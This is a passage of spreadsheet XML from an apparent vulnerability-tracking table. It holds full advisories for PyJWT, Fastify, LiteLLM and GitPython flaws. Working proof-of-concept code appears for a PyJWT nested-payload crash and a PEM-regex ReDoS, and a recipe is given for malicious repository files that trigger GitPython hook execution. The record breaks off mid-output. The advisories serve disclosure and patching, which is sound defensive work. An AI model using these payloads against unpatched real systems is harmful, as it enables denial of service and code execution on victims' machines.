          <t>OSV</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr">
        <is>
          <t>PyPI:pyjwt</t>
        </is>
      </c>
      <c r="M21" s="5" t="inlineStr">
        <is>
          <t>2.15.0</t>
        </is>
      </c>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr"/>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>## Summary
`PyJWKClient.get_signing_key_from_jwt(token)` — the first step of the JWKS
verification flow documented in `docs/usage.rst` — must decode a token's
payload before its signature can be checked, via
`jwt.api_jwt.decode_complete(token, options={"verify_signature": False})`.
That call parses the payload with `json.loads` in `PyJWT._decode_payload`
(`jwt/api_jwt.py:297-300`), whose `except` clause catches only `ValueError`.
A payload that is valid JSON but nested ~20,000 levels deep makes
`json.loads` raise `RecursionError`, which is **not** a `ValueError` and
escapes as a raw, undocumented exception type — not `DecodeError`,
`InvalidTokenError`, or `PyJWTError`, so every documented error-handling
pattern in `docs/usage.rst` misses it.
The token needs no valid signature and no network access — the crash
happens during payload parsing, before the `kid` is even looked up. A
single unauthenticated ~50KB request crashes the caller's auth handler
(HTTP 500 / dead worker), repeatably. The same path is reachable through
plain `jwt.decode(token, options={"verify_signature": False})` too.
Notably, this project already fixed the **identical** bug class for the
JWS **header** path — `PyJWS._load` catches `(ValueError, RecursionError)`
and wraps it in `DecodeError` (`jwt/api_jws.py:360-361`), and
`CHANGELOG.rst` (v2.14.0, "Security") states "Handle deeply nested and
malformed JWS/JWK input without uncaught recursion errors." The payload
path — the one part of a forged token an unauthenticated attacker fully
controls — was left catching `ValueError` alone, so that security fix does
not fully hold.
A second, related instance: `PyJWKClient.fetch_data` (`jwt/jwks_client.py:168`)
parses a JWKS endpoint's response with `json.load(response)` inside a
`try` that only catches `(URLError, TimeoutError, http.client.HTTPException)`
— a deeply-nested JSON response from a JWKS endpoint raises the same raw
`RecursionError`, uncaught entirely (worse than the payload path, which at
least caught plain `ValueError`).
**Affected versions:** confirmed present in the current release, 2.14.0,
and on the current `master` branch (commit `4adcd02722f5011c60079d3978dfc167b9a8eaa5`).
## Reproduction
```python
import base64, json, jwt
def b64url(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=")
header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
payload = b64url(b"[" * 20_000 + b"]" * 20_000)
token = (header + b"." + payload + b"." + b64url(b"forged-sig")).decode()
jwt.decode(token, options={"verify_signature": False})
# raises: RecursionError (not DecodeError/InvalidTokenError/PyJWTError)
```
Control: the same deeply-nested structure moved into the token's **header**
instead of its payload is correctly converted to `jwt.DecodeError` by the
already-hardened `jwt/api_jws.py:360` — confirming the payload path is
specifically the missed half of the v2.14.0 hardening, not a general gap.
## Impact assessment
Unauthenticated denial-of-service via unhandled exception on an auth path.
Not an auth bypass — rated medium. With signature verification enabled,
this parse runs after `_verify_signature`, so only the pre-verification
paths (`get_signing_key_from_jwt`, explicit `verify_signature=False`) are
attacker-reachable pre-auth; the JWKS-endpoint variant requires control of
(or a MITM on) the configured JWKS endpoint rather than being reachable
from an arbitrary client token.
## Suggested fix
In `jwt/api_jwt.py:299`, change `except ValueError as e:` to
`except (ValueError, RecursionError) as e:`, mirroring
`jwt/api_jws.py:360` exactly. In `jwt/jwks_client.py`, add the same
`(ValueError, RecursionError)` handling around `json.load(response)` in
`fetch_data`, raising `PyJWKClientError` (consistent with the method's
existing documented error contract). A patch implementing both, verified
against the full test suite (457 passed, 4 skipped — pre-existing,
environment-related) and against the reproduction above (now correctly
raises `DecodeError`), is attached (`fix.patch`).
## Discovery method
Found and verified using `scopegrep` (https://github.com/not-ekalabya/scopegrep)
— a semantic code-retrieval tool that surfaces every other call site of a
symbol alongside relevance-ranked results, which is what surfaced the
already-hardened header path as the direct comparison here — paired with
an LLM coding agent (GLM-5.3) run as an open-ended security review of this
repository. Independently reproduced against the exact commit above before
this report was written. Happy to share the full session transcript on
request.
## Disclosure status
Not shared with any other party or published. Submitting through this
private channel per the project's stated security policy; no planned
public/conference disclosure ahead of a coordinated timeline.
---
## Maintainer triage update (2026-09-22)
### Confirmed finding and scope
We confirmed that an attacker-controlled recursively nested JWT payload can cause a raw Python `RecursionError` to escape PyJWT at PyJWT 2.14.0 and the tested current source. The confirmed in-scope paths are direct decoding with `verify_signature=False` and `PyJWKClient.get_signing_key_from_jwt`, where payload parsing occurs before key lookup.
The demonstrated impact is limited to an uncaught exception for the affected call, which may surface as an application HTTP 500 when the application does not catch it. Testing did not demonstrate a worker or process crash, persistent resource exhaustion, resource amplification, authentication bypass, or confidentiality or integrity impact.
The separate JWKS-response subclaim is out of scope under the policy boundary that requires the application to trust its configured JWKS source and transport. The confirmed payload finding is not a duplicate of the earlier protected-header parser finding: it occurs in a distinct payload parsing path that remained affected after the earlier header-only fix.
### Version and remediation status
Historical testing reproduced the confirmed payload behavior in all 20 official supported PyJWT 2.x releases from 2.0.0a1 through 2.14.0, inclusive. Unsupported PyJWT 1.7.1 also reproduces the behavior, but it is excluded from the advisory range under the supported-2.x policy. No supported unaffected release and no patched release exists. The exact evidence is `/Users/jpadilla/.codex/security-advisories/pyjwt/GHSA-42vr-xj54-vc7v-historical-range-20260922.md` (SHA-256 `c48f1ac35641e9382d53e6a879a71ad9a8fb4432bbe871f2b8330f8d166a2d81`) and `/Users/jpadilla/.codex/security-advisories/pyjwt/historical-range-42vr-20260922/historical-range-results.json` (SHA-256 `324997f231561bf6da39b8f9d1e272f69bfde8871a7863f5cb7b70e22e91f076`). The evidence-backed supported affected range is `&gt;= 2.0.0a1, &lt;= 2.14.0`.
Historical range verification is complete. A local fix commit exists and has passed independent review and the complete local CI suite, but it has not been merged into `master` or released. Consequently, `patched_versions` remains empty and this advisory remains in `triage`. The remaining next step is a maintainer decision on remediation and merge. After a fix lands in `master` and is released, `patched_versions` and advisory lifecycle can be updated in a separate approved batch.
---
## Maintainer remediation update (2026-09-23)
The confirmed payload-parser finding has been fixed on `master`. Commit
`5fde08a6cf906aa7698de2d6391d88b73006b17b` converts a recursive
payload parse failure to the expected `DecodeError`; commit
`9bc06658f875b9b40091539140bbbdc4639161c3` makes the regression tests
deterministic across supported Python versions. This update supersedes the
2026-09-22 remediation-status statement that the fix had not landed.
The original pre-verification payload reproducer and the
`PyJWKClient.get_signing_key_from_jwt` path were covered by regression tests.
The exact landed tree passed the full 39-environment local tox matrix and
GitHub CI for commit `9bc06658f875b9b40091539140bbbdc4639161c3` passed
all 25 jobs, including Ubuntu Python 3.14 and 3.15. The demonstrated impact
remains an uncaught request-level exception in affected releases; there is
still no evidence of process termination, persistent resource exhaustion,
authentication bypass, or confidentiality or integrity impact.
The supported affected range remains `&gt;= 2.0.0a1, &lt;= 2.14.0`. The latest
released version is 2.14.0, which predates these commits; no released
patched version exists yet, so `patched_versions` remains unset. CVSS v3.1
5.3 (Medium) and CWE-248 remain unchanged. The advisory may now move from
triage to private draft. The next lifecycle step is a new supported 2.x
release containing the fix, followed by separately approved patched-version
and publication updates after release verification.
---
## Maintainer release update (2026-09-23)
PyJWT 2.15.0 is the first released version containing the payload-parser fix. Its GitHub release tag points to commit `1d41a6478e1562e68ff667fcd703356acf085f68`, which includes fix commit `5fde08a6cf906aa7698de2d6391d88b73006b17b` and deterministic regression-test commit `9bc06658f875b9b40091539140bbbdc4639161c3`. PyPI published both the wheel and source distribution from that release commit through the successful production workflow at https://github.com/jpadilla/pyjwt/actions/runs/35891602963.
The published PyPI wheel (`pyjwt-2.15.0-py3-none-any.whl`, SHA-256 `7a3742debf6b879e912dbb9819ceec1594be812452b78c5f2e2dfc56564954f8`) was checked directly: the deeply nested unsigned payload now raises `DecodeError`, while an ordinary unsigned payload still decodes. The supported affected range remains `&gt;= 2.0.0a1, &lt;= 2.14.0`; the patched version is `2.15.0`. Earlier statements in this advisory that no released patched version exists are superseded by this update.
The confirmed impact remains an uncaught request-level exception in affected versions, not a demonstrated process crash or authentication bypass. The separate JWKS-response subclaim remains outside this advisory's confirmed PyJWT-owned scope.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101918</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102270</t>
        </is>
      </c>
      <c r="D22" s="5" t="inlineStr"/>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>PyPI:pyjwt</t>
        </is>
      </c>
      <c r="M22" s="5" t="inlineStr">
        <is>
          <t>2.14.0</t>
        </is>
      </c>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr"/>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>### Summary
There is a Re-DoS vulnerability in the `is_pem_format` function which results in a intesive CPU usage if an attacker is been able to provide a custom certificate.
### Details
The problem is that the lazy quantifier `.+?` will always first try to match as little as possible until it finds a `---- END`. Normally this means the complexity of this should be O(N). However, by providing an input which consists only of `----BEGIN CERTIFICATE-----` lines and no `---- END` line, the regex algorithm will first try to match the first line and then, with the lazy quantifier, all the lines until the end O(N), which then fails since it is unable to find a `---- END` line. It will then jump to the next line, resulting in N re-scans of the whole string, which means the complexity basically results in O(N²). 
### PoC
```python
import time
import re
BEGIN_LINE = b"-----BEGIN CERTIFICATE-----\n"
_PEMS = {
    b"CERTIFICATE",
    b"TRUSTED CERTIFICATE",
    b"PRIVATE KEY",
    b"PUBLIC KEY",
    b"ENCRYPTED PRIVATE KEY",
    b"OPENSSH PRIVATE KEY",
    b"DSA PRIVATE KEY",
    b"RSA PRIVATE KEY",
    b"RSA PUBLIC KEY",
    b"EC PRIVATE KEY",
    b"DH PARAMETERS",
    b"NEW CERTIFICATE REQUEST",
    b"CERTIFICATE REQUEST",
    b"SSH2 PUBLIC KEY",
    b"SSH2 ENCRYPTED PRIVATE KEY",
    b"X509 CRL",
}
_PEM_RE = re.compile(
    b"----[- ]BEGIN ("
    + b"|".join(_PEMS)
    + b""")[- ]----\r?
.+?\r?
----[- ]END \\1[- ]----\r?\n?""",
    re.DOTALL,
)
def is_pem_format(key: bytes) -&gt; bool:
    return bool(_PEM_RE.search(key))
def make_payload(num_headers: int) -&gt; bytes:
    return BEGIN_LINE * num_headers
def measure(num_headers: int) -&gt; float:
    payload = make_payload(num_headers)
    start = time.perf_counter()
    is_pem_format(payload)  # returns False, but burns CPU getting there
    elapsed = time.perf_counter() - start
    print(
        f"  headers={num_headers:&gt;4}  size={len(payload)//1024:&gt;3} KB"
        f"   time={elapsed*1000:&gt;7.1f} ms"
    )
    return elapsed
for n in (1000, 2000, 4000, 8000):
    measure(n)
```
### Impact
The attacker could use extensive resources, which could make the resource (e.g. a web server) unavailable.
### Maintainer update (2026-09-10): 
We reproduced the reported quadratic regex behavior on malformed PEM-like input: doubling repeated BEGIN lines produced approximately fourfold runtime growth, while equal-sized ordinary input remained negligible. The affected path is reached when an application passes attacker-controlled key or certificate bytes to PyJWT’s key preparation, and the impact is resource exhaustion. The fix is on master in commit 8b4e233a22206b34ec1186e912e75c0b2396ac07; it replaces the backtracking PEM regex with a bounded marker scan. Fresh Astra/max review accepted the fix and confirmed malformed, mixed-label, and valid-input controls. This is a distinct ReDoS finding from the later PEM-recognition report that shares the implementation commit. The fix has not yet shipped in a released PyJWT 2.x version, so this advisory is being moved to draft and remains unpublished pending release.
## Maintainer update — 2026-09-11
The verified fix for this advisory is included in PyJWT 2.14.0, released on 2026-09-11 and available on PyPI. PyJWT 2.14.0 is the first release containing the fix. This advisory is now published with the release recorded as the patched version.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102270</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76169</t>
        </is>
      </c>
      <c r="D23" s="5" t="inlineStr"/>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M23" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr"/>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify routes a malformed URL under one plugin prefix to the custom not-found handler of a different sibling plugin, invoking the handler registered last and skipping the `preHandler` declared in its `setNotFoundHandler()`. When the request method has no route in the main router, a malformed request target reaches Fastify's internal not-found router before URL decoding and is dispatched through a single shared handler pointer, regardless of prefix and without the normal request lifecycle. An unauthenticated request to a public prefix can therefore reach an authentication-protected not-found handler registered under a different prefix and receive its full response, breaking prefix encapsulation and bypassing the authentication hook. Applications whose private or tenant fallbacks return protected data from a not-found handler are affected.
### Patches
Patched in fastify 5.12.2. Malformed URLs are now routed through the configured `onBadUrl` and `onMaxParamLength` handlers so they fail closed before any application not-found handler runs, and the shared not-found handler pointer has been removed.
### Workarounds
Reject malformed request targets before they reach the application, for example at an upstream proxy or gateway, and do not rely on a not-found handler to serve protected data. A global `onRequest` authentication hook does not mitigate this, because the malformed-URL path skips it.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76169</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84377</t>
        </is>
      </c>
      <c r="D24" s="5" t="inlineStr"/>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr">
        <is>
          <t>PyPI:litellm</t>
        </is>
      </c>
      <c r="M24" s="5" t="inlineStr">
        <is>
          <t>1.88.6, 1.89.7, 1.90.7, 1.91.5, 1.92.2, 1.93.2</t>
        </is>
      </c>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr"/>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>### Impact
Any authenticated LiteLLM proxy user could redirect an outbound provider call to a destination they control and cause the proxy to send its own configured provider credentials to that destination. The proxy's request-body validation was a denylist that did not cover every sensitive parameter and did not inspect parameters nested inside other request fields, so a caller could supply a routing or credential value that the proxy applied without clearing the operator's stored key. Any authenticated user could therefore exfiltrate the operator's upstream provider credentials and other configured secrets, and perform Server-Side Request Forgery against internal services reachable from the proxy.
### Patches
Fixed in 1.96.2, 1.95.1, 1.94.3, 1.93.2, 1.92.2, 1.91.5, 1.90.7, 1.89.7, and 1.88.6.
### Workarounds
Set `general_settings.allow_client_side_credentials` to `false` so callers cannot override connection parameters, restrict proxy keys to trusted callers, and block the affected parameters (`api_base`, `base_url`, `model_list`, `fallbacks`, provider credential fields) at a reverse proxy or API gateway.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84377</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84428</t>
        </is>
      </c>
      <c r="D25" s="5" t="inlineStr"/>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M25" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr"/>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify lowercases header-schema property names before compiling the schema, because Node.js stores request header names in lowercase. That normalization was incomplete: it lowercased only top-level `properties` keys and the root `required` array, and did not lowercase the JSON Schema Draft 7 `dependencies` keyword (its trigger keys and dependent property names) or names in nested subschemas. As a result, a header schema that uses `dependencies` to require one header when another is present (for example `X-Admin` requiring `X-Admin-Token`) never matches the lowercased request headers, so the dependency assertion is silently skipped. An unauthenticated remote client can send the header that activates a privileged path while omitting the header the dependency was meant to require, bypassing a schema-enforced security control. The header schema is idiomatic, valid JSON Schema Draft 7, and no custom validator, malformed request, or misconfiguration is required.
### Patches
Header-schema names are now normalized across all schema positions (`properties`, `required`, `dependencies`, `dependentRequired`, `dependentSchemas`, and nested subschemas). Patched in fastify `5.12.2`. The fix is also included in the `6.0.0` release. Header schemas referenced through an external shared `$ref` (registered with `addSchema`) are not reached by this normalization and now emit an `FSTSEC002` startup warning; inline the header schema to keep case-insensitive assertions in effect.
### Workarounds
If upgrading is not immediately possible, write header-schema names in lowercase so the `dependencies` and other case-sensitive assertions match Node's lowercased request headers, or enforce the cross-header requirement in an `onRequest` or `preValidation` hook instead of the schema.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84428</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84469</t>
        </is>
      </c>
      <c r="D26" s="5" t="inlineStr"/>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M26" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr"/>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify decided whether to validate a request part by checking its schema for JavaScript truthiness. JSON Schema Draft 7 defines the boolean `false` as a valid schema that rejects every instance, but because `false` is falsy, a route that set `body`, `querystring`, `params`, or `headers` to `false` had that part left uncompiled: no validator was attached and the request reached the handler. An application that used `false` as a deny-all schema to make a route unreachable was therefore fully bypassed, and an unauthenticated remote client could reach the handler with any input. The same applied to the documented `query` alias for `querystring`. This is a complete bypass rather than a weak-schema issue, since `false` is the strongest JSON Schema assertion and must always fail.
### Patches
Request-part schemas are now selected by an explicit presence check rather than truthiness, so a boolean `false` (or `true`) schema is compiled and enforced, including through the `query` alias. Patched in fastify `5.12.2`. The fix is also included in the `6.0.0` release.
### Workarounds
If upgrading is not immediately possible, express a deny-all request schema with an always-failing object schema instead of the boolean `false` (for example `{ "not": {} }`), or reject the request in an `onRequest` hook.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84469</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84504</t>
        </is>
      </c>
      <c r="D27" s="5" t="inlineStr"/>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M27" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr"/>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify runs a route's validator and, for a result shaped like `{ value, error }`, unwraps it: an `error` becomes a validation failure and `value` replaces the request part. This convention is intended for synchronous custom compilers (for example Joi). A JSON Schema `$async` validator, however, resolves with the validated data itself, so Fastify applied the same unwrapping to it. If a request part validated by an `$async` schema contains a `value` property, Fastify replaced the whole request part with that nested value before the handler ran, so a `value` or `error` property in the payload was attacker-controlled. An application that dispatches operations from the validated request body could then act on data that never satisfied the route schema, leading to unauthorized state changes or disclosure. Reaching the vulnerable path requires the route to use an `$async` request schema.
### Patches
Fastify no longer treats an asynchronous validation result as a `{ value, error }` wrapper: an async validator's resolved value is used only to determine pass or fail, and it can no longer replace the request part or inject an error. The synchronous custom-compiler contract is unchanged. Patched in fastify `5.12.2` and `6.0.0`.
### Workarounds
If upgrading is not immediately possible, avoid `$async` request schemas, or perform the security-sensitive check in an `onRequest` or `preHandler` hook rather than relying on the schema-validated request part. Custom async validator compilers should signal failure by throwing (rejecting) rather than returning an `{ error }` object.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84504</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87817</t>
        </is>
      </c>
      <c r="D28" s="5" t="inlineStr"/>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M28" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr"/>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>### Summary
`Repo.__init__` decides which directory is the git directory by testing candidate paths in an order that
considers the real `.git` **last**. Two earlier tests can be satisfied by ordinary tracked files. Git
reserves only the literal name `.git`, so `HEAD`, `objects/`, `refs/`, `config`, `gitdir`, `commondir`
and `hooks/` at a repository root are all legal tracked content.
Consequently, after a victim opens or clones an attacker's repository, GitPython resolves `git_dir` to
the **working-tree root** while real git correctly resolves `&lt;root&gt;/.git`. Everything GitPython then
treats as "inside the git directory" is attacker-authored content — including `hooks/`, which it
executes.
### CVE-2026-87817
### Affected code (3.1.59)
The discovery loop in `git/repo/base.py` tests, in order:
1. `git/repo/base.py:299` — `isfile(curpath/gitdir)` **and** `isfile(curpath/commondir)` **and** `isfile(curpath/HEAD)`
2. `git/repo/base.py:320` — `is_git_dir(curpath)`
3. `git/repo/base.py:341` — `dotgit = osp.join(curpath, ".git")` ← the real git dir, considered last
`is_git_dir` (`git/repo/fun.py:60`) requires only that `objects/` and `refs/` are directories and that
`HEAD` is a file; **`HEAD`'s contents are never parsed.** The hook path is resolved from
`index.repo.git_dir` (`git/index/fun.py:73`), i.e. the mis-resolved directory.
### Proof of concept
Requires only `pip install GitPython==3.1.59`. Full script attached as `poc1_rce.py`; it runs entirely
in a temp directory and the payload only writes a marker file.
Attacker repository — four ordinary tracked files at the root:
| path | mode | content |
|---|---|---|
| `gitdir` | 100644 | `.git\n` |
| `commondir` | 100644 | `.git\n` |
| `HEAD` | 100644 | `ref: refs/heads/master\n` |
| `hooks/pre-commit` | **100755** | `#!/bin/sh` + payload |
Victim — two ordinary calls:
```python
repo = git.Repo.clone_from(url, dst)     # or git.Repo(dst)
repo.index.commit("automated commit")    # code execution happens here
```
Observed on the PyPI release 3.1.59 (Linux and Windows):
```
real git says the git dir is : /tmp/.../victim/.git
